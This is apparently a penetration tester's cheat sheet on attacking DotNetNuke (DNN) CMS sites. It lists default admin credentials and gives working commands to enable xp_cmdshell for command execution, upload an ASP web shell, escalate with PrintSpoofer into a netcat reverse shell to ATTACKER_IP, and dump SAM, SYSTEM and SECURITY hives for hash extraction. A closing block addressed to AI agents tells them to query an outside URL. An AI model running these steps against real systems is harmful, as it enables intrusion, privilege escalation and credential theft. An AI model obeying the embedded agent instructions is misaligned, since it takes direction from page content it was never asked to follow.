# DotNetNuke (DNN) ## Discovery ```bash # Identify DNN from HTTP response proxychains curl http://TARGET | grep -i "DNN\|DotNetNuke" # Login page http://TARGET/Login?returnurl=%2fadmin # Default admin login http://TARGET/Login?returnurl=%2fadmin ``` * DNN is a .NET-based CMS (the "WordPress of .NET") * Default install page says "Every journey begins with the first step" * User registration may be available but usually requires admin approval *** ## Enumeration ```bash # Check version curl -s http://TARGET | grep -i "dnn\|dotnetnuke" # Common paths /Login /admin /Host /Portals/0/ /DesktopModules/ ``` *** ## Exploitation (Authenticated as Admin) ### RCE via SQL Console DNN has a built-in SQL console under the **Settings** page. Enable `xp_cmdshell` to execute OS commands: ```sql EXEC sp_configure 'show advanced options', '1' RECONFIGURE EXEC sp_configure 'xp_cmdshell', '1' RECONFIGURE ``` Execute commands: ```sql xp_cmdshell 'whoami' xp_cmdshell 'hostname' xp_cmdshell 'ipconfig' ``` ### RCE via File Upload (ASP/ASPX Web Shell) 1. Browse to `Settings → Security → More → More Security Settings` 2. Under **Allowable File Extensions**, add `asp` and `aspx` 3. Click **Save** 4. Navigate to `http://TARGET/admin/file-management` 5. Upload an [ASP web shell](https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/asp/newaspcmd.asp) 6. Right-click uploaded file → **Get URL** 7. Access the URL to execute commands To transfer tools (e.g., PrintSpoofer, nc.exe), add `.exe` to allowable extensions, then upload via File Management. Uploaded files land in `c:\DotNetNuke\Portals\0\`. ### Reverse Shell via PrintSpoofer If the DNN app pool runs with `SeImpersonatePrivilege`: ```cmd c:\DotNetNuke\Portals\0\PrintSpoofer64.exe -c "c:\DotNetNuke\Portals\0\nc.exe ATTACKER_IP 443 -e cmd" ``` *** ## Post-Exploitation ### Dump SAM Database ```cmd reg save HKLM\SYSTEM SYSTEM.SAVE reg save HKLM\SECURITY SECURITY.SAVE reg save HKLM\SAM SAM.SAVE ``` Add `.SAVE` to allowable file extensions, download via File Management, then extract: ```bash secretsdump.py LOCAL -system SYSTEM.SAVE -sam SAM.SAVE -security SECURITY.SAVE ``` ### Download Files via DNN Add the target file extension (e.g., `.SAVE`, `.exe`) to **Allowable File Extensions**, then browse to File Management and download. *** ## Default Credentials | Username | Password | | -------- | -------- | | host | dnnhost | | admin | dnnadmin | *** ## Key Paths | Path | Description | | -------------------------- | ---------------------------------------- | | `c:\DotNetNuke\Portals\0\` | Default upload directory | | `web.config` | Database credentials, connection strings | | `/DesktopModules/` | Installed modules | | `/Portals/` | Site content and uploads | --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.ice-wzl.xyz/things-i-have-pwnd-before/dotnetnuke.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.